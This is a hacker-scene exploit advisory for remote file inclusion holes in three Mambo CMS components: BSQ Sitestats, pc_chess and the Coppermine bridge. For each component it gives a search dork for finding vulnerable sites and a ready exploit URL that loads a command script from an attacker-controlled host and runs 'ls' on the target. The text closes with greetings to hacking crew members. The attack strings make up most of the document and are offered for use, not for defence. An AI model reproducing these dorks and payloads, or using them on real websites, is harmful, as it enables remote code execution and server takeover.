-------------------------------------------------------------------------------- Title : Multiple Remote File Include Vuln in component Mambo CMS ############################################################################### Discovered By OLiBekaS ----------------------------------------------------------------------------- Affected software description : ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : component for Mambo CMS ----------------------------------------------------------------------------- 1# BSQ Sitestats - url : http://www.bs-squared.com/ - dork : index.php?option=com_bsq_sitestats - exploit : http://[target]/[path]/com_bsq_sitestats/external/rssfeed.php?baseDir=http://[attacker]/cmd.txt?&cmd=ls ------------------------------------------------------------------------------ 2# pc_chess Component - dork : index.php?option=com_pcchess - exploit : http://[target]/[path]/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://[attacker]/cmd.txt?&cmd=ls ------------------------------------------------------------------------------- #3 cpg bridge component for Mambo ( Coppermine Bridge Component ) - dork : index.php?option=com_cpg - exploit : http://[target]/[path]/components/com_cpg/cpg.php?mosConfig_absolute_path=http://[attacker]/cmd.txt?&cmd=ls ------------------------------------ [eof] ------------------------------------------- greatz: ~~~~~ # Special greetz to my master effex and bEdAh`oTaK ( thank man ) # To all members of #papmahackerlink, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster, yugo^cloudy. and other ------------------------------------------------------------------------------- Contact: ~~~~~~~ Nick: OLiBekaS E-mail: olibekas[at]gmail[dot]Com Homepage: http://bekas.6te.net --------------------------------- [ eof ] ---------------------------------------